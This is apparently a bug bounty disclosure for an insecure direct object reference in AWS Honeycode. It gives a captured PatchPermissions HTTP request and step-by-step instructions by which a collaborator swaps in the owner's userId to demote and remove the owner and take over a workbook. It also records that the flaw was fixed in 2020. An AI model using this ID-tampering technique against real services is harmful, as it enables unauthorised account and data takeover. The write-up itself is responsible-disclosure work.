Company Information :
Amazon Web Services, Inc. is a subsidiary of Amazon that provides on-demand cloud computing platforms and APIs to individuals, companies, and governments, on a metered, pay-as-you-go basis. Clients will often use this in combination with autoscaling.
Bug Category :
Insecure direct object reference (IDOR) :
Insecure direct object reference is a type of access control vulnerability in digital security. This can occur when a web application or application programming interface uses an identifier for direct access to an object in an internal database but does not check for access control or authentication.
Target Information :
https://builder.honeycode.aws/
Technical Details of the Bug :
On https://builder.honeycode.aws you can add a workbook and add users to it as collaborators. A collaborator has limited access to the workbook's functionality and to the sharing controls. However, there is a way for a collaborator to demote the owner, remove them, and take over the workbook.
Vulnerable HTTP request :
POST / HTTP/1.1
Host: control.us-west-2.honeycode.aws
Connection: close
Content-Length: 472
content-encoding: amz-1.0
x-client-id: clientRegion|BeehiveSDSJSUtils||||
x-amz-target: com.amazon.sheets.control.api.SheetsControlServiceAPI_20170701.PatchPermissions
x-amz-requestsupertrace: true
x-amzn-requestid: e162ac01-db10-445b-a06e-edea28186b45
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
content-type: application/json
Accept: */*
Origin: https://builder.honeycode.aws
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [cookies]

{"id":"arn:aws:sheets:us-west-2:122162422134:workbook:[workbookID]","grantPermissions":{"userPermissions":[{"userId":"[user_ID]","role":"collaborator"}],"emailSubject":"vijay g has shared Untitled1 with you","emailBody":"\nvijay g has shared \"Untitled1\" workbook and all of its apps with you.\n\nhttps://builder.honeycode.aws/sheet/1-us-west-2%3A122162422134%3Aworkbook%3A34c548e1-af8d-46ef-83a7-6dd98f9a0391\n "}}
Vulnerable Parameter : userId
Steps To Reproduce:
To reproduce the issue I will use three users: one as owner and two as team members.
owner account: owner@mail.com, test1 account: test1@mail.com, and test2 account: test2@mail.com
1. Log in from the owner account and go to the Teams section.
2. Add the test1 and test2 accounts as members, and complete the approval process for both.
Note : You can capture the hashed userIds of these users from this section.
3. Go to the home page, where you can add a new workbook (for example, "owner workbook").
4. Add the new workbook and, via the Share button, add the test1 user as a collaborator.
5. Log in from the test1 account and go to the home page, where you will find the owner's workbook.
6. Click Share; you will notice that you have the option of adding a new user to the workbook, but you cannot make any changes to the owner account and cannot assign the owner role to any user, including yourself.
7. Add the test2 account to the owner's workbook and intercept the request.
8. The request will look like the request shown above.
9. Change the userId to the owner account's user ID; the server accepts it and the owner is demoted to collaborator.
10. You will notice that the owner is no longer the owner and has been demoted to collaborator.
11. From the test1 account you can now delete the owner and take over the sheet.
Impact :
Workbook takeover and deletion of the owner on https://builder.honeycode.aws by a collaborator user (IDOR)
Timeline :
June 26th 2020 : Report sent to the AWS Product Security Team through HackerOne.
June 26th 2020 : Report accepted and triaged.
July 2nd 2020 : Issue fully resolved and confirmed.
July 2nd 2020 : $7200 bounty awarded